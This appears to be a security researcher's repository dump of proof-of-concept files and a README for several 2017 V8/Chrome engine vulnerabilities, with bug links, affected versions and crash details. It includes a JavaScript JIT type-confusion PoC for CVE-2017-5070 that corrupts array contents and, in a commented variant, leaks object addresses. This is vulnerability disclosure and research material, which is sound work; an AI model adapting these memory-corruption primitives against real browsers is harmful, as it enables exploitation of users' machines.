├── CVE-2017-15399 ├── hello_chrome_3.html └── poc.html ├── CVE-2017-15428 └── replace_csa.html ├── CVE-2017-5070 ├── 5070_poc.js └── hello_chrome.html ├── CVE-2017-XXXX └── wasm_init.html └── README.md /CVE-2017-15399/hello_chrome_3.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2017-15399/poc.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2017-15428/replace_csa.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2017-5070/5070_poc.js: -------------------------------------------------------------------------------- 1 | z2 = [1.1,2.2]; 2 | z3 = [1,{}]; 3 | var arr_arr = [z2,z3]; 4 | var obj = {}; 5 | function f(){ 6 | 7 | for(var i = 0;i < arr_arr.length;i++){ 8 | var temp = arr_arr[i]; 9 | temp[1] = 1.1; 10 | } 11 | } 12 | 13 | for(var i = 0;i < 0x10000;i++){ 14 | f(); 15 | } 16 | 17 | var evil = [1.1,2.2]; 18 | 19 | function oo(){ 20 | //z2[0] = 2.2; 21 | evil[0] = 1.1; 22 | f(); 23 | evil[1] = 6.176516726456e-312; 24 | //return evil[1]; 25 | } 26 | 27 | for(var i = 0;i < 0x10000;i++){ 28 | oo(); 29 | } 30 | //evil.slice(); 31 | 32 | 33 | //var now = Date.now(); 34 | //while(Date.now() - now < 500){}; //wait for the JIT complete 35 | 36 | arr_arr[0] = evil; 37 | re = oo(); 38 | 39 | print(evil[1]); 40 | 41 | 42 | /* 43 | z2 = [1.1,2.2]; 44 | z3 = [1,{}]; 45 | var arr_arr = [z3,z2]; 46 | var obj = {}; 47 | function f(){ 48 | 49 | for(var i = 0;i < arr_arr.length;i++){ 50 | var temp = arr_arr[i]; 51 | temp[1] = obj; //leak any object address here; 52 | } 53 | } 54 | 55 | for(var i = 0;i < 0x10000;i++){ 56 | f(); 57 | } 58 | 59 | var evil = [1.1,2.2]; 60 | 61 | function oo(){ 62 | //z2[0] = 2.2; 63 | evil[0] = 1.1; 64 | f(); 65 | //evil[1] = 6.176516726456e-312; 66 | return evil[1]; 67 | } 68 | 69 | for(var i = 0;i < 0x10000;i++){ 70 | oo(); 71 | } 72 | //evil.slice(); 73 | 74 | 75 | //var now = Date.now(); 76 | //while(Date.now() - now < 500){}; //wait for the JIT complete 77 | 78 | arr_arr[0] = evil; 79 | re = oo(); 80 | 81 | print(re); 82 | */ -------------------------------------------------------------------------------- /CVE-2017-5070/hello_chrome.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2017-XXXX/wasm_init.html: -------------------------------------------------------------------------------- 1 | 1105 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | V8_November_2017 2 | 3 | Some V8 vuls which they were fixed in about November 2017. 4 | 5 | CVE-2017-5070 6 | 7 | https://bugs.chromium.org/p/chromium/issues/detail?id=722756 8 | 9 | Chrome version: 58.0.3029.110 Channel: stable 10 | 11 | This problem belongs to the crankshaft,in the latest V8 version(16th May 2017)(use crankshaft to JIT),I can reproduce this issue.At this version,the chrome use crankshaft to JIT. 12 | 13 | CVE-2017-15399 14 | 15 | https://bugs.chromium.org/p/chromium/issues/detail?id=776677 16 | 17 | https://chromium.googlesource.com/v8/v8.git/+/5f960dfc06a7c95af69e2b09f772b2280168469b 18 | 19 | VULNERABILITY DETAILS 20 | 21 | This is a Use After Free Vul in V8.More information please see the html file. 22 | 23 | VERSION 24 | 25 | Chrome Version: 62.0.3202.62 Stable (32bit) 26 | 27 | Operating System: [Windows 10 1703 64bit] 8G Memory 28 | 29 | 30 | CVE-2017-15428 31 | 32 | https://bugs.chromium.org/p/chromium/issues/detail?id=782145 33 | 34 | https://chromium.googlesource.com/v8/v8.git/+/55a98076827edac8eba775f8025df3749bcd8367 35 | 36 | VULNERABILITY DETAILS 37 | 38 | There is a type confusion problem in the String.prototype.replace runtime call.If we change the RegExp type(from fast regexp to slow regexp),we will also go to the fast regexp code path.At last,this will cause OOB Read Write of the lastIndex. 39 | 40 | VERSION 41 | 42 | Chrome Version: 62.0.3202.89 Stable 64 bit 43 | 44 | Operating System: Windows 10 1703 64bit 45 | 46 | REPRODUCTION CASE 47 | 48 | In the debug build,it will crash in CSA_ASSERT(this, IsFastRegExp(context, regexp)) of the function TF_BUILTIN(RegExpReplace, RegExpBuiltinsAssembler); 49 | 50 | In the release build,it will crash in the address 0x300000008,and please note that,this addresss we can control it through control the lastIndex value. 51 | 52 | CVE-2017-XXXX(duplicate with chromium worker) 53 | 54 | https://bugs.chromium.org/p/chromium/issues/detail?id=782102 55 | 56 | https://chromium.googlesource.com/v8/v8.git/+/b60438869987952083597c2ce55a9abdba19d557 57 | 58 | VULNERABILITY DETAILS 59 | 60 | This is a OOB Read Write Problem in V8:WebAssembly. 61 | 62 | VERSION 63 | 64 | Chrome Version: 62.0.3202.89 Stable Operating System: Windows 10 1703 64bit 65 | 66 | REPRODUCTION CASE 67 | --------------------------------------------------------------------------------